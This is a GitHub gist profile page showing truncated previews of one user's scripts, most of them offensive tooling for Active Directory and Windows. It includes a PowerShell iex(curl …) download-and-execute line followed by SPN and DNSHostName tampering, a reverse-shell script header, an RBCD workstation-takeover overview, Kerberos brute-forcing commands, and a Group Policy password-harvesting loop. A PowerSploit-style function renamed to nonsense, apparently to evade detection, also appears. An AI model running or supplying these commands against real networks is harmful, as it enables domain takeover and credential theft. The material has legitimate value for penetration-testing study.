Dvir S. Dviros

💭
😼 😼 😼 😼 😼 😼 😼 😼 😼 😼
View GitHub Profile
iex(curl https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1 -UseBasicParsing )
Import-ActiveDirectory
Set-ADComputer WIN-JQTB1UHHF2S -ServicePrincipalNames @{REPLACE="HOST/WIN-JQTB1UHHF2S","RestrictedKrbHost/WIN-JQTB1UHHF2S"} -Verbose
# In my testing I had to set DNSHostName to $null first
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName $null
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName dc1.batcave.local
@Dviros
Dviros / DynWin32-ReverseShell.ps1
Created January 30, 2022 15:38 — forked from qtc-de/DynWin32-ReverseShell.ps1
PowerShell reverse shell that uses dynamically resolved Win32 API functions
<#
DynWin32-ReverseShell.ps1 is a reverse shell based on dynamically looked up Win32 API calls.
The script uses reflection to obtain access to GetModuleHandle, GetProcAddress and CreateProcess.
Afterwards it uses GetModuleHandle and GetProcAddress to resolve the required WSA functions
from ws2_32.dll.
This script should be used for educational purposes only (and maybe while playing CTF :D).
It was only tested on Windows 10 (x64) and is probably not stable or portable. It's only
purpose is to demonstrate the usage of reflective lookups of Win32 API calls. See it as
:: Windows 10 OSED Setup
::
:: Connect over RDP with: rdesktop IP -u Offsec -p lab -r disk:kali=/home/kali/OSED/ -P
:: Store files in ~/OSED/files/. Check script for appropriate file locations
::
:: Extra files sourced from: https://github.com/corelan/windbglib
::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:: Install mona
@Dviros
Dviros / Workstation-Takeover.md
Created July 25, 2021 20:50 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. In short, this is accomplished by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@Dviros
Dviros / kerberos_attacks_cheatsheet.md
Created June 15, 2020 20:12 — forked from knethteo/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@Dviros
Dviros / nmap_parser.ps1
Last active July 23, 2019 22:33
Simple and effective NMAP parser using PowerShell
$file = Read-Host "Full path for NMAP scan XML file, eg C:\nmap.xml"
$xml = [xml](Get-Content $file)
$Results = $xml.nmaprun.host |
ForEach-Object {
    # One ordered hashtable per host: address first, then one column per service name
    $hash = [ordered]@{}; $hash.Address = $_.address.addr
    Foreach ($port in $_.ports.port) {
        $hash."$($port.service.name)" = $port.state.state
    }
    # Emit the host as an object so $Results can be piped to Format-Table/Export-Csv
    # (the closing of this block is cut off in the gist preview)
    [pscustomobject]$hash
}
@Dviros
Dviros / wireguard_pihole_install.sh
Created April 29, 2019 19:49 — forked from sethenoka/wireguard_pihole_install.sh
A script for installing a Wireguard VPN with Pi-Hole (Unbound) recursive DNS
#!/bin/bash
# This file is designed to spin up a Wireguard VPN quickly and easily,
# including configuring Pi-Hole as a recursive local DNS server using
# Unbound to block ads at the DNS level
#
# Make sure to change the public/private keys before running the script
# Also change the IPs, IP ranges, and listening port if desired
# add wireguard repo
sudo add-apt-repository ppa:wireguard/wireguard -y
@Dviros
Dviros / Get-GPPPassword_multi_domain.ps1
Created April 4, 2019 12:32
Quick and dirty AD query script, in use for multi AD environments. This script utilizes Powersploit's GPPPassword tool (Chris Campbell, obscuresec) to run.
# Quick and dirty AD query script, in use for multi AD environments.
# This script utilizes Powersploit's GPPPassword tool (Chris Campbell, obscuresec) to run.
##############################################################################################################
$domains = ("Domain1","Domain2")
Import-Module PATH_TO_FILE\Get-GPPPassword.ps1
foreach ($domain in $domains){
Write-Host "Testing SMB Connectivity to" $domain
function Invoke-Kukuriku21112222
{
[CmdletBinding(DefaultParameterSetName="Dupiduuuuu123")]
Param(
[Parameter(Position = 0)]
[String[]]
$ComputerName,
[Parameter(ParameterSetName = "Dupiduuuuu123", Position = 1)]
[Switch]